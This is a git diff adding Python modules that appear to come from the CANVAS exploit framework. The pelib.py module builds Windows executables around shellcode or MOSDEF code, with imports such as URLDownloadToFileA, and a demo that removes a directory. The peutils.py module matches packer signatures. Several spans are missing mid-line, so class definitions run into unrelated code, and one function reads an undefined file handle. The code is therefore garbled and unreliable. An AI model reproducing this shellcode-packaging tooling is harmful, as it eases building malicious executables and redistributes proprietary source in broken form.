+ rel_addr = self.link_symbols[rel_offset][rel_name]
+ except:
+ print "We can't resolve the symbol: %s"%rel_name
+ raise KeyError
+ if isinstance(rel_addr, tuple):
+ flags=rel_addr[1]
+ rel_addr=rel_addr[0]
+
+ self.link_relocations.append((sect_addr + reloc.VirtualAddress, rel_addr, reloc.Type, flags))
+ return symbol
+
+def hexdump(buf):
+ tbl=[]
+ tmp=""
+ hex=""
+ i=0
+ for a in buf:
+ hex+="%02X "% ord(a)
+ i+=1
+ if ord(a) >=0x20 and ord(a) <0x7f:
+ tmp+=a
+ else:
+ tmp+="."
+ if i%16 == 0:
+ tbl.append((hex, tmp))
+ hex=""
+ tmp=""
+ tbl.append((hex, tmp))
+ for a in tbl:
+ print "%s: %s"%(a[0],a[1])
diff --git a/1.73/Libs/pelib.py b/1.73/Libs/pelib.py
new file mode 100755
index 0000000..1c1d9e8
--- /dev/null
+++ b/1.73/Libs/pelib.py
@@ -0,0 +1,1337 @@
+#! /usr/bin/env python
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.} pelib
+
+Proprietary CANVAS source code - use only under the license agreement
+specified in LICENSE.txt in your CANVAS distribution
+Copyright Immunity, Inc, 2002-2007
+http://www.immunityinc.com/CANVAS/ for more information
+
+"""
+
+__VERSION__ = '1.0'
+
+import struct, sys
+sys.path.append(".")
+sys.path.append("../")
+#try:
+# import mosdefutils
+#except ImportError:
+# # Is this IMdbug
+# import immutils
+
+try:
+ import mosdef
+except ImportError:
+ pass
+try:
+ from shellcode import shellcodeGenerator
+except ImportError:
+ pass
+
+IMAGE_SIZEOF_FILE_HEADER=20
+MZ_MAGIC = 0x5A4D
+PE_MAGIC = 0x4550
+IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16
+IMAGE_ORDINAL_FLAG = 0x80000000L
+
+# PE documentation:
+# http://win32assembly.online.fr/files/pe1.zip
+
+def hexdump(buf):
+ tbl=[]
+ tmp=""
+ hex=""
+ i=0
+ for a in buf:
+ hex+="%02X "% ord(a)
+ i+=1
+ if ord(a) >=0x20 and ord(a) <0x7f:
+ tmp+=a
+ else:
+ tmp+="."
+ if i%16 == 0:
+ tbl.append((hex, tmp))
+ hex=""
+ tmp=""
+ tbl.append((hex, tmp))
+ return tbl
+
+def readStringFromFile(fd, offset):
+ idx= fd.tell()
+ fd.seek(offset)
+ b=f.read(4096*4)
+ zero=b.find("\0")
+ fd.seek(idx)
+ if zero > -1:
+ return b[:zero]
+ return ""
+
+#typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header
+ #USHORT e_magic; // Magic number
+ #USHORT e_cblp; // Bytes on last page of file
+ #USHORT e_cp; // Pages in file
+ #USHORT e_crlc; // Relocations
+ #USHORT e_cparhdr; // Size of header in paragraphs
+ #USHORT e_minalloc; // Minimum extra paragraphs needed
+ #USHORT e_maxalloc; // Maximum extra paragraphs needed
+ #USHORT e_ss; // Initial (relative) SS value
+ #USHORT e_sp; // Initial SP value
+ #USHORT e_csum; // Checksum
+ #USHORT e_ip; // Initial IP value
+ #USHORT e_cs; // Initial (relative) CS value
+ #USHORT e_lfarlc; // File address of relocation table
+ #USHORT e_ovno; // Overlay number
+ #USHORT e_res[4]; // Reserved words
+ #USHORT e_oemid; // OEM identifier (for e_oeminfo)
+ #USHORT e_oeminfo; // OEM information; e_oemid specific
+ #USHORT e_res2[10]; // Reserved words
+ #LONG e_lfanew; // File address of new exe header
+ #} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;
+
+
+class PEError(Exception): pass
+
+class MZ:
+
+ def __init__(self):
+ self.fmt="<30HL"
+ self.e_magic=0x5A4D
+ self.e_cblp=self.e_cp=self.e_crlc=self.e_cparhdr=self.e_minalloc=self.e_maxalloc = self.e_ss = self.e_sp =\
+ self.e_csum = self.e_ip= self.e_cs = self.e_lfarlc = self.e_ovno = self.e_oemid =\
+ self.e_oeminfo = self.e_res2 =self.e_lfanew = 0
+
+ self.e_res = [0,0,0,0]
+ self.e_res2 = [0,0,0,0,0,0,0,0,0,0]
+
+ def getSize(self):
+ return struct.calcsize(self.fmt)
+
+ def get(self, data):
+ try:
+ buf=struct.unpack(self.fmt, data[:struct.calcsize(self.fmt)])
+ except struct.error:
+ raise PEError, "The header doesn't correspond to a MZ header"
+
+ self.e_magic = buf[0]
+ self.e_cblp = buf[1]
+ self.e_cp = buf[2]
+ self.e_crlc = buf[3]
+ self.e_cparhdr = buf[4]
+ self.e_minalloc = buf[5]
+ self.e_maxalloc = buf[6]
+ self.e_ss = buf[7]
+ self.e_sp = buf[8]
+ self.e_csum = buf[9]
+ self.e_ip = buf[10]
+ self.e_cs = buf[11]
+ self.e_lfarlc = buf[12]
+ self.e_ovno = buf[13]
+ self.e_res = buf[14:18]
+ self.e_oemid = buf[18]
+ self.e_oeminfo = buf[19]
+ self.e_res2 = buf[20:30]
+ self.e_lfanew = buf[30]
+
+ if self.e_magic != MZ_MAGIC:
+ raise PEError, "The header doesn't correspond to a MZ header"
+
+ def raw(self):
+ return struct.pack(self.fmt, self.e_magic, self.e_cblp, self.e_cp,\
+ self.e_crlc, self.e_cparhdr, self.e_minalloc,\
+ self.e_maxalloc, self.e_ss, self.e_sp, self.e_csum,\
+ self.e_ip, self.e_cs, self.e_lfarlc, self.e_ovno, \
+ self.e_res[0],self.e_res[1],self.e_res[2],self.e_res[3],\
+ self.e_oemid, self.e_oeminfo,\
+ self.e_res2[0], self.e_res2[1], self.e_res2[2], self.e_res2[3],\
+ self.e_res2[4], self.e_res2[5], self.e_res2[6], self.e_res2[7],
+ self.e_res2[8], self.e_res2[9], self.e_lfanew)
+
+ # returns the e_lfanew offset
+ def getPEOffset(self):
+ return self.e_lfanew
+
+class ImageImportByName:
+ def __init__(self):
+ self.fmt = "= (self.VirtualAddress+imagebase) and rva < (self.VirtualAddress+self.VirtualSize+imagebase)
+
+ def hasOffset(self, offset):
+ return offset >= self.PointerToRawData and offset < (self.PointerToRawData + self.VirtualSize)
+
+
+ def get(self, data):
+ idx=0
+
+ self.Name=data[idx:idx+8]
+ idx+=8
+
+ (self.VirtualSize, self.VirtualAddress, self.SizeOfRawData, self.PointerToRawData ,\
+ self.PointerToRelocations, self.PointerToLinenumbers,\
+ self.NumberOfRelocations, self.NumberOfLinenumbers,\
+ self.Characteristics)= \
+ struct.unpack(self.fmt, data[idx:])
+
+ def raw(self):
+ self.Name = (self.Name + "\x00" * (8-len(self.Name)))[:8]
+ return self.Name + struct.pack(self.fmt, self.VirtualSize, \
+ self.VirtualAddress, self.SizeOfRawData, self.PointerToRawData,\
+ self.PointerToRelocations, self.PointerToLinenumbers,\
+ self.NumberOfRelocations, self.NumberOfLinenumbers,\
+ self.Characteristics)
+
+
+
+#typedef struct _IMAGE_FILE_HEADER {
+# USHORT Machine;
+# USHORT NumberOfSections;
+# ULONG TimeDateStamp;
+# ULONG PointerToSymbolTable;
+# ULONG NumberOfSymbols;
+# USHORT SizeOfOptionalHeader;
+# USHORT Characteristics;
+#} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
+
+##define IMAGE_SIZEOF_FILE_HEADER 20
+class IMGhdr:
+ def __init__(self):
+ self.imagefmt= "<2H3L2H"
+ (self.Machine,\
+ self.NumberOfSections,\
+ self.TimeDateStamp,\
+ self.PointerToSymbolTable,\
+ self.NumberOfSymbols,\
+ self.SizeOfOptionalHeader,\
+ self.Characteristics)= (0,0,0,0,0,0xe0,0)
+
+ def get(self, data):
+ try:
+ (self.Machine,\
+ self.NumberOfSections,\
+ self.TimeDateStamp,\
+ self.PointerToSymbolTable,\
+ self.NumberOfSymbols,\
+ self.SizeOfOptionalHeader,\
+ self.Characteristics)=struct.unpack(self.imagefmt, data)
+ except struct.error:
+ raise PEError, "Invalid IMAGE header" % self.signature
+
+ def getSize(self):
+ return struct.calcsize(self.imagefmt)
+
+ def raw(self):
+ try:
+ return struct.pack(self.imagefmt,self.Machine,\
+ self.NumberOfSections,\
+ self.TimeDateStamp,\
+ self.PointerToSymbolTable,\
+ self.NumberOfSymbols,\
+ self.SizeOfOptionalHeader,\
+ self.Characteristics)
+ except struct.error:
+ raise PEError, "Image not initialized" % self.signature
+
+
+#typedef struct _IMAGE_OPTIONAL_HEADER {
+# //
+# // Standard fields.
+# //
+# USHORT Magic;
+# UCHAR MajorLinkerVersion;
+# UCHAR MinorLinkerVersion;
+# ULONG SizeOfCode;
+# ULONG SizeOfInitializedData;
+# ULONG SizeOfUninitializedData;
+# ULONG AddressOfEntryPoint;
+# ULONG BaseOfCode;
+# ULONG BaseOfData;
+# //
+# // NT additional fields.
+# //
+# ULONG ImageBase;
+# ULONG SectionAlignment;
+# ULONG FileAlignment;
+# USHORT MajorOperatingSystemVersion;
+# USHORT MinorOperatingSystemVersion;
+# USHORT MajorImageVersion;
+# USHORT MinorImageVersion;
+# USHORT MajorSubsystemVersion;
+# USHORT MinorSubsystemVersion;
+# ULONG Reserved1;
+# ULONG SizeOfImage;
+# ULONG SizeOfHeaders;
+# ULONG CheckSum;
+# USHORT Subsystem;
+# USHORT DllCharacteristics;
+# ULONG SizeOfStackReserve;
+# ULONG SizeOfStackCommit;
+# ULONG SizeOfHeapReserve;
+# ULONG SizeOfHeapCommit;
+# ULONG LoaderFlags;
+# ULONG NumberOfRvaAndSizes;
+# IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
+#} IMAGE_OPTIONAL_HEADER, *PIMAGE_OPTIONAL_HEADER;
+
+class IMGOPThdr:
+ def __init__(self):
+ self.optionalfmt="
+ idx+= len(shellcode)
+ data_offset = self.align(idx, imgOpt.FileAlignment)
+ secondpad= "\0" * (data_offset - idx)
+ idx = data_offset
+ data_buf =""
+ idx+= len(data_buf)
+
+ # Creating the list of ImportDescriptors
+ import_offset =idx
+ imports=[]
+ ndx= 0
+ import_str=""
+
+ for a in importante:
+ i= ImportDescriptor()
+ i.ForwarderChain= 0xFFFFFFFFL
+ imports.append( (i, ndx))
+
+ ndx+=len(a[0]+"\0") # We put on NDX, an index of the name string, so at the end
+ # to find a string, we will do import_str_offset + this_index
+
+ import_str += a[0] + "\0" # Collecting dll names
+
+ # The final importdescriptor
+ imports.append((ImportDescriptor(), 0))
+ idx+= i.getSize() * len(imports)
+
+ import_str_offset = idx
+ idx+= len(import_str)
+
+ off = self.align(idx, imgOpt.FileAlignment)
+ import_str+="\0" * (off-idx)
+ idx = off
+
+ # Original Thunks
+ original_thunks_offset = idx
+ original_thunk=[]
+ for a in importante:
+ original_thunk.append(idx)
+ idx+= len(a[1]) * 4 + 4
+
+ # First thunk offset
+ first_thunks_offset = idx
+ first_thunk=[]
+ for a in importante:
+ first_thunk.append(idx)
+ idx+= len(a[1]) * 4 + 4
+
+ # Creating IIBN
+ IIBN=[]
+ for a in importante:
+ tbl=[]
+ IIBN.append(tbl)
+ for b in a[1]:
+ iibn = ImageImportByName()
+ iibn.Name = b #"RevertToSelf"
+ iibn.Hint = 1
+ tbl.append((iibn, idx))
+ idx+=iibn.getSize()
+
+ endpad= "\0" * (self.align(idx, imgOpt.FileAlignment) - idx)
+
+ # Filling the gaps
+ imgOpt.SizeOfCode = len(shellcode) + len(secondpad)
+ imgOpt.BaseOfCode = imgOpt.AddressOfEntryPoint = code_offset
+ imgOpt.BaseOfData = data_offset
+ imgOpt.ImageBase = 0x40000
+ imgOpt.SizeOfInitializedData = 0x20
+ imgOpt.SizeOfImage = 0xc # ?
+
+ imgOpt.SizeOfHeaders = code_offset
+ imgOpt.NumberOfRvaAndSizes = 0x10
+
+ # Import Directory
+
+ directories[1].VirtualSize=directories[1].Size = idx - import_offset
+ directories[1].VirtualAddress= import_offset
+
+ # code and data
+ code.VirtualAddress = code_offset
+ code.VirtualSize= code.SizeOfRawData = imgOpt.SizeOfCode
+ code.PointerToRawData = code_offset
+
+ data.VirtualAddress = data_offset
+ data.VirtualSize = data.SizeOfRawData = idx - data_offset #len(data_buf)
+ data.PointerToRawData = data_offset
+
+ imgOpt.SizeOfImage = idx # code.SizeOfRawData + data.SizeOfRawData
+
+ # Fixing imports with thunk info
+ for a in range(0, len(imports)-1):
+ imports[a][0].OriginalFirstThunk= original_thunk[a]
+ imports[a][0].FirstThunk= first_thunk[a]
+ imports[a][0].Name = import_str_offset + imports[a][1]
+
+
+ # RAWing...
+ buf = mz.raw() + struct.pack("L", PE_MAGIC) +imgHdr.raw() + imgOpt.raw()
+ for a in directories:
+ buf+= a.raw()
+ buf+= code.raw()
+ buf+= data.raw()
+ buf+= firstpad
+ buf+= shellcode
+ buf+= secondpad
+ buf+= data_buf
+
+ for a in imports:
+ buf+= a[0].raw()
+ buf+= import_str
+
+ # ORIGINAL THUNK
+ for a in IIBN:
+ for b in a: # Listing function
+ buf+=struct.pack("L",b[1])
+ buf+=struct.pack("L",0x0)
+
+ # FIRST THUNK
+ for a in IIBN:
+ for b in a: # Listing function
+ buf+=struct.pack("L",b[1])
+ buf+=struct.pack("L",0x0)
+
+ # IIBN
+ for a in IIBN:
+ for b in a:
+ buf+= b[0].raw()
+ buf+= endpad
+
+ return buf
+
+
+ # For MOSDEF
+ def createMOSDEFPE(self, filename, code, vars={}):
+ from win32peresolver import win32peresolver
+ # shellcode, importante=[ ("advapi32.dll", ["RevertToSelf"])] ):
+
+ # Mixing MOSDEF with PElib.
+ # Concerning Mosdef:
+ # Basically, we have a win32peresolver that pass some fixed address (that would be our PE PLT)
+ # and thats returned to the compile code. The win32peresolver put all this address on a cached.
+ #
+ # Concerning PE
+ # First of all, we need to compile before everything, cause we need the list of imported functions
+ # So, we send mosdef a hardcoded address(0x401A0) offset: 0x1A0 which is where the .text section start.
+ # At that address, will be our PLT (jmp *(IAT_entry)), so we have to point the Entry Address to
+ # .code + function_number * sizeof(jmp *(IAT_entry)). So we land on the begging on the shellcode.
+ #
+ # To discover where the IAT would be (we need to know this, before creating the PLT), we need to calculate
+ # where the First thunk
+ #
+ # buf+= secondpad
+ # buf+= data_buf
+ #
+ # for a in imports:
+ # buf+= a[0].raw()
+ # buf+= import_str
+ #
+ # # ORIGINAL THUNK
+ # for a in IIBN:
+ # for b in a: # Listing function
+ # buf+=struct.pack("L",b[1])
+ # buf+=struct.pack("L",0x0)
+ # # FIRST THUNK
+ # for a in IIBN:
+ # for b in a: # Listing function
+ # buf+=struct.pack("L",b[1])
+ # buf+=struct.pack("L",0x0)
+
+ # side note: .code must be aligned
+
+ image_base = 0x40000
+ plt_len = len(mosdef.assemble("jmp *(0x01020304)", "X86"))
+ plt_entry = 0x1A0 + image_base
+
+ w=win32peresolver(plt_entry)
+ w.setPLTEntrySize(plt_len)
+
+ shellcode = w.compile(code, vars)
+
+ # We need to pass the functioncache[func] = address into [ ("advapi32.dll", ["RevertToSelf"])] format
+ # Yeah, probably you can do it better or with one fancy python line
+ dll={}
+ func_by_addr = {}
+ functions_num=0
+
+
+ for a in w.remotefunctioncache.keys():
+ s = a.split("|")
+ if dll.has_key( s[0] ):
+ dll[s[0] ].append(s[1])
+ else:
+ dll[ s[0] ] = [ s[1] ]
+ functions_num+=1
+ func_by_addr[a] = w.remotefunctioncache[a]
+
+ importante = []
+ for a in dll.keys():
+ importante.append( (a, dll[a]) )
+ shellcode = "\x90" * ( plt_len * functions_num) + shellcode
+
+ # So, by now we have important in the fancy format [ ('dll name', ['functions'] ) ]
+ # And also, func_by_addr = {dllname!function]: function_plt }, and also functions_num has the size of functions
+
+
+
+ idx= 0
+ # MZ
+ mz = MZ()
+ mz.e_lfanew = mz.getSize()
+
+ idx+= mz.getSize()
+
+ # PE Image Header
+ imgHdr = IMGhdr()
+ imgHdr.Machine = 0x014c # i386
+ imgHdr.NumberOfSections = 0x2 # Code and data for now (Maybe we can do it only one)
+ imgHdr.Characteristics = 0x0102 # Executable on 32-bit machine
+
+ idx += imgHdr.getSize() + 4 # for PE_MAGIC
+
+ # Optional Header
+ imgOpt = IMGOPThdr()
+ imgOpt.SectionAlignment = 0x20 # Thats our aligment
+ imgOpt.FileAlignment = 0x20
+ imgOpt.MajorOperatingSystemVersion = 0x4 # NT4.0
+ imgOpt.MajorSubsystemVersion = 0x4 # Win32 4.0
+ imgOpt.Subsystem = 0x3
+ imgOpt.SizeOfStackReserve = 0x100000
+ imgOpt.SizeOfStackCommit = 0x1000
+ imgOpt.SizeOfHeapReserve = 0x100000
+ imgOpt.SizeOfHeapCommit = 0x1000
+ imgOpt.NumberOfRvaAndSizes= 0x10
+
+ idx += imgOpt.getSize()
+
+ # Directories
+ directories=[]
+ for a in range(0, imgOpt.NumberOfRvaAndSizes):
+ directories.append(Directory())
+
+ idx+= directories[0].getSize() * 16
+
+ # .code section
+ code = Section()
+ code.Name = ".text"
+ code.Characteristics = 0x60000020L # Code | Executable | Readable
+ idx+= code.getSize()
+
+ # .data section
+ data = Section()
+ data.Name = ".data"
+ data.Characteristics = 0xc0000040L # Initialized | Readable | Writeable
+
+ idx += data.getSize()
+
+ code_offset = self.align(idx, imgOpt.FileAlignment)
+ firstpad= "\0" * (code_offset - idx)
+ idx=code_offset
+
+ # we can fill data_buf with our data and that will be loaded into mem :>
+ idx+= len(shellcode)
+ data_offset = self.align(idx, imgOpt.FileAlignment)
+ secondpad= "\0" * (data_offset - idx)
+ idx = data_offset
+ data_buf =""
+ idx+= len(data_buf)
+
+ # Creating the list of ImportDescriptors
+ import_offset =idx
+ imports=[]
+ ndx= 0
+ import_str=""
+
+ for a in importante:
+ i= ImportDescriptor()
+ i.ForwarderChain= 0xFFFFFFFFL
+ imports.append( (i, ndx))
+
+ ndx+=len(a[0]+"\0") # We put on NDX, an index of the name string, so at the end
+ # to find a string, we will do import_str_offset + this_index
+
+ import_str += a[0] + "\0" # Collecting dll names
+
+ # The final importdescriptor
+ imports.append((ImportDescriptor(), 0))
+ idx+= i.getSize() * len(imports)
+
+ import_str_offset = idx
+ idx+= len(import_str)
+
+ off = self.align(idx, imgOpt.FileAlignment)
+ import_str+="\0" * (off-idx)
+ idx = off
+
+ # Original Thunks
+ original_thunks_offset = idx
+ original_thunk=[]
+
+ for a in importante:
+ original_thunk.append(idx)
+
+ idx+= len(a[1]) * 4 + 4
+
+ # First thunk offset
+ first_thunks_offset = idx
+ first_thunk=[]
+ plt_ndx = 0x1A0
+ for a in importante:
+ first_thunk.append(idx)
+ for b in a[1]:
+ dupla = "%s|%s" % (a[0], b)
+
+ if not func_by_addr.has_key(dupla):
+ raise PEError, "Error on Thunk"
+ func_by_addr[ func_by_addr[dupla] ] = "jmp *(0x%08x)\n" % (idx+ image_base)
+ idx+=4
+ idx+= 4
+ # crafting a PLT
+ PLT=""
+ for a in range(plt_entry, plt_entry+ plt_len* functions_num, plt_len):
+ if not func_by_addr.has_key(a):
+ raise PEError, "func_by_addr doesn't have a PLT address (%x)" % a
+ PLT+= mosdef.assemble(func_by_addr[a], "X86")
+ shellcode = PLT + shellcode[plt_len* functions_num:]
+ print "Shellcode size (with PLT): %d" % len(shellcode)
+
+
+ # Creating IIBN
+ IIBN=[]
+ for a in importante:
+ tbl=[]
+ IIBN.append(tbl)
+ for b in a[1]:
+ iibn = ImageImportByName()
+ iibn.Name = b #"RevertToSelf"
+ iibn.Hint = 1
+ tbl.append((iibn, idx))
+ idx+=iibn.getSize()
+
+ endpad= "\0" * (self.align(idx, imgOpt.FileAlignment) - idx)
+
+ # Filling the gaps
+ imgOpt.SizeOfCode = len(shellcode) + len(secondpad)
+ imgOpt.BaseOfCode = code_offset
+ # Entry point = code_offset + PLT_entry size
+ imgOpt.AddressOfEntryPoint = code_offset + plt_len * functions_num
+
+ imgOpt.BaseOfData = data_offset
+ imgOpt.ImageBase = image_base
+ imgOpt.SizeOfInitializedData = 0x20
+ imgOpt.SizeOfImage = 0xC #
+
+ imgOpt.SizeOfHeaders = code_offset
+ imgOpt.NumberOfRvaAndSizes = 0x10
+
+ # Import Directory
+
+ directories[1].VirtualSize=directories[1].Size = idx - import_offset
+ directories[1].VirtualAddress= import_offset
+
+ # code and data
+ code.VirtualAddress = code_offset
+ code.VirtualSize= code.SizeOfRawData = imgOpt.SizeOfCode
+ code.PointerToRawData = code_offset
+
+ data.VirtualAddress = data_offset
+ data.VirtualSize = data.SizeOfRawData = idx - data_offset #len(data_buf)
+ data.PointerToRawData = data_offset
+
+ imgOpt.SizeOfImage = idx #
+
+ # Fixing imports with thunk info
+ for a in range(0, len(imports)-1):
+ imports[a][0].OriginalFirstThunk= original_thunk[a]
+ imports[a][0].FirstThunk= first_thunk[a]
+ imports[a][0].Name = import_str_offset + imports[a][1]
+
+
+ # RAWing...
+ buf = mz.raw() + struct.pack("L", PE_MAGIC) +imgHdr.raw() + imgOpt.raw()
+ for a in directories:
+ buf+= a.raw()
+ buf+= code.raw()
+ buf+= data.raw()
+ buf+= firstpad
+ buf+= shellcode
+ buf+= secondpad
+ buf+= data_buf
+
+ for a in imports:
+ buf+= a[0].raw()
+ buf+= import_str
+
+ # ORIGINAL THUNK
+ for a in IIBN:
+ for b in a: # Listing function
+ buf+=struct.pack("L",b[1])
+ buf+=struct.pack("L",0x0)
+
+ # FIRST THUNK
+ for a in IIBN:
+ for b in a: # Listing function
+ buf+=struct.pack("L",b[1])
+ buf+=struct.pack("L",0x0)
+
+ # IIBN
+ for a in IIBN:
+ for b in a:
+ buf+= b[0].raw()
+ buf+= endpad
+
+ # Done, dumping to a file
+ f=open(filename, "wb")
+ f.write(buf)
+ f.close()
+ return len(buf)
+
+def usage(name):
+ print "usage: %s -f [-O -W]" % name
+ print "\t -O inspect the file given by -f"
+ print "\t -W create a .exe using createShellcode"
+ print "\t -E create a .exe using MOSDEF code"
+ sys.exit(0)
+
+if __name__ == "__main__":
+ import getopt, sys
+ args= sys.argv[1:]
+ OPEN = 0x1
+ WRITE = 0x2
+ EXAMPLE = 0x3
+ p=PElib()
+
+ what=0
+ file=""
+ try:
+ opts, args = getopt.getopt(args, "f:OWE")
+ except:
+ print "Error in Arguments"
+ usage(sys.argv[0])
+ for o,a in opts:
+ if o == '-f':
+ file=a
+ if o == '-O':
+ what =OPEN
+ if o == '-W':
+ what = WRITE
+ if o == '-E':
+ what = EXAMPLE
+ if file:
+ if what == OPEN:
+ p.openfile(file)
+ elif what == WRITE:
+ shellcode=p.createShellcode()
+ imports = [ ("advapi32.dll", ["RevertToSelf", "AccessCheck"]), ("urlmon.dll", ["URLDownloadToFileA", "FindMediaType" ]) ]
+
+ p.createPE(file, shellcode, imports)
+
+ elif what == EXAMPLE:
+ vars={}
+ vars["filename"]="boo"
+
+ code="""
+ //start of code
+ #import "remote", "kernel32.dll|GetProcAddress" as "getprocaddress"
+ #import "remote", "kernel32.dll|RemoveDirectoryA" as "RemoveDirectory"
+ #import "remote", "kernel32.dll|ExitProcess" as "exit"
+ #import "string", "filename" as "filename"
+
+ void main()
+ {
+ int i;
+ i = RemoveDirectory(filename);
+ i = exit(0);
+ }
+ """
+
+
+ p.createMOSDEFPE(file, code, vars)
+
+ else:
+ usage(sys.argv[0])
+ else:
+
+ usage(sys.argv[0])
+
+
+ #self._openPE()
diff --git a/1.73/Libs/peutils.py b/1.73/Libs/peutils.py
new file mode 100755
index 0000000..2abc25f
--- /dev/null
+++ b/1.73/Libs/peutils.py
@@ -0,0 +1,444 @@
+# -*- coding: Latin-1 -*-
+"""peutils, Portable Executable utilities module
+
+
+Copyright (c) 2005, 2006, 2007 Ero Carrera
+
+All rights reserved.
+
+For detailed copyright information see the file COPYING in
+the root of the distribution archive.
+"""
+
+import os
+import re
+import string
+import urllib
+
+__author__ = 'Ero Carrera'
+__version__ = '1.0.0'
+__contact__ = 'ero@dkbza.org'
+
+
+
+
+class SignatureDatabase:
+ """This class loads and keeps a parsed PEiD signatute database.
+
+ Usage:
+
+ sig_db = SignatureDatabase('/path/to/signature/file')
+
+ and/or
+
+ sig_db = SignatureDatabase()
+ sig_db.load('/path/to/signature/file')
+
+ Signature databases can be combined by performing multiple loads.
+
+ The filename parameter can be a URL too. In that case the
+ signature database will be downloaded from that location.
+ """
+
+
+ def __init__(self, filename=None, data=None):
+
+ # RegExp to match a signature block
+ #
+ self.parse_sig = re.compile(
+ '\[(.*?)\]\s+?signature\s*=\s*(.*?)ep_only\s*=\s*(\w+)(?:\s*section_start_only\s*=\s*(\w+)|)', re.S)
+
+ # Singature information
+ #
+ # Signatures are stored as trees using dictionaries
+ # The keys are the byte values while the values for
+ # each key are either:
+ #
+ # - Other dictionaries of the same form for further
+ # bytes in the signature
+ #
+ # - A dictionary with a string as a key (packer name)
+ # and None as value to indicate a full signature
+ #
+ self.signature_tree_eponly_true = dict ()
+ self.signature_count_eponly_true = 0
+ self.signature_tree_eponly_false = dict ()
+ self.signature_count_eponly_false = 0
+ self.signature_tree_section_start = dict ()
+ self.signature_count_section_start = 0
+
+ # The depth (length) of the longest signature
+ #
+ self.max_depth = 0
+
+ self.__load(filename=filename, data=data)
+
+
+
+ def generate_section_signatures(self, pe, name, sig_length=512):
+ """Generate signatures for all the sections in a PE file.
+
+ If the section contains any data a signature will be created
+ for it. The signature name will be a combination of the
+ parameter 'name' and the section number and its name.
+ """
+
+ section_signatures = list()
+
+ for idx, section in enumerate(pe.sections):
+
+ if section.SizeOfRawData < sig_length:
+ continue
+
+ #offset = pe.get_offset_from_rva(section.VirtualAddress)
+ offset = section.PointerToRawData
+
+ sig_name = '%s Section(%d/%d,%s)' % (
+ name, idx + 1, len(pe.sections),
+ ''.join([c for c in section.Name if c in string.printable]))
+
+ section_signatures.append(
+ self.__generate_signature(
+ pe, offset, sig_name, ep_only=False,
+ section_start_only=True,
+ sig_length=sig_length) )
+
+ return '\n'.join(section_signatures)+'\n'
+
+
+
+ def generate_ep_signature(self, pe, name, sig_length=512):
+ """Generate signatures for the entry point of a PE file.
+
+ Creates a singature whose name will be the parameter 'name'
+ and the section number and its name.
+ """
+
+ offset = pe.get_offset_from_rva(pe.OPTIONAL_HEADER.AddressOfEntryPoint)
+
+ return self.__generate_signature(
+ pe, offset, name, ep_only=True, sig_length=sig_length)
+
+
+
+ def __generate_signature(self, pe, offset, name, ep_only=False,
+ section_start_only=False, sig_length=512):
+
+ data = pe.__data__[offset:offset+sig_length]
+
+ signature_bytes = ' '.join(['%02x' % ord(c) for c in data])
+
+ if ep_only == True:
+ ep_only = 'true'
+ else:
+ ep_only = 'false'
+
+ if section_start_only == True:
+ section_start_only = 'true'
+ else:
+ section_start_only = 'false'
+
+ signature = '[%s]\nsignature = %s\nep_only = %s\nsection_start_only = %s\n' % (
+ name, signature_bytes, ep_only, section_start_only)
+
+ return signature
+
+
+
+ def match(self, pe, ep_only=False, section_start_only=False):
+ """Match and return the exact match(es).
+
+ If ep_only is True the result will be a string with
+ the packer name. Otherwise it will be a list of the
+ form (file_ofsset, packer_name). Specifying where
+ in the file the signature was found.
+ """
+
+ matches = self.__match(pe, ep_only, section_start_only)
+
+ # The last match (the most precise) from the
+ # list of matches (if any) is returned
+ #
+ if matches:
+ if ep_only == False:
+ # Get the most exact match for each list of matches
+ # at a given offset
+ #
+ return [(match[0], match[1][-1]) for match in matches]
+
+ return matches[1][-1]
+
+ return None
+
+
+
+ def match_all(self, pe, ep_only=False, section_start_only=False):
+ """Match and return the all the likely matches."""
+
+ matches = self.__match(pe, ep_only, section_start_only)
+
+ if matches:
+ if ep_only == False:
+ # Get the most exact match for each list of matches
+ # at a given offset
+ #
+ return matches
+
+ return matches[1]
+
+ return None
+
+
+
+ def __match(self, pe, ep_only, section_start_only):
+
+
+ # Load the corresponding set of signatures
+ # Either the one for ep_only equal to True or
+ # to False
+ #
+ if section_start_only is True:
+
+ # Fetch the data of the executable as it'd
+ # look once loaded in memory
+ #
+ try :
+ data = pe.__data__
+ except Exception, excp :
+ raise
+
+ # Load the corresponding tree of signatures
+ #
+ signatures = self.signature_tree_section_start
+
+ # Set the starting address to start scanning from
+ #
+ scan_addresses = [section.PointerToRawData for section in pe.sections]
+
+ elif ep_only is True:
+
+ # Fetch the data of the executable as it'd
+ # look once loaded in memory
+ #
+ try :
+ data = pe.get_memory_mapped_image()
+ except Exception, excp :
+ raise
+
+ # Load the corresponding tree of signatures
+ #
+ signatures = self.signature_tree_eponly_true
+
+ # Fetch the entry point of the PE file and the data
+ # at the entry point
+ #
+ ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint
+
+ # Set the starting address to start scanning from
+ #
+ scan_addresses = [ep]
+
+ else:
+
+ data = pe.__data__
+
+ signatures = self.signature_tree_eponly_false
+
+ scan_addresses = xrange( len(data) )
+
+
+ # For each start address, check if any signature matches
+ #
+ matches = []
+ for idx in scan_addresses:
+ result = self.__match_signature_tree(
+ signatures,
+ data[idx:idx+self.max_depth])
+ if result:
+ matches.append( (idx, result) )
+
+ # Return only the matched items found at the entry point if
+ # ep_only is True (matches will have only one elment in that
+ # case)
+ #
+ if ep_only is True:
+ if matches:
+ return matches[0]
+
+ return matches
+
+
+
+ def __match_signature_tree(self, signature_tree, data, depth = 0):
+ """Recursive function to find matches along the signature tree.
+
+ signature_tree is the part of the tree left to walk
+ data is the data being checked against the signature tree
+ depth keeps track of how far we have gone down the tree
+ """
+
+
+ matched_names = list ()
+ match = signature_tree
+
+ # Walk the bytes in the data and match them
+ # against the signature
+ #
+ for idx, byte in enumerate ( [ord (b) for b in data] ):
+
+ # If the tree is exhausted...
+ #
+ if match is None :
+ break
+
+ # Get the next byte in the tree
+ #
+ match_next = match.get(byte, None)
+
+
+ # If None is among the values for the key
+ # it means that a signature in the database
+ # ends here and that there's an exact match.
+ #
+ if None in match.values():
+ # idx represent how deep we are in the tree
+ #
+ #names = [idx+depth]
+ names = list()
+
+ # For each of the item pairs we check
+ # if it has an element other than None,
+ # if not then we have an exact signature
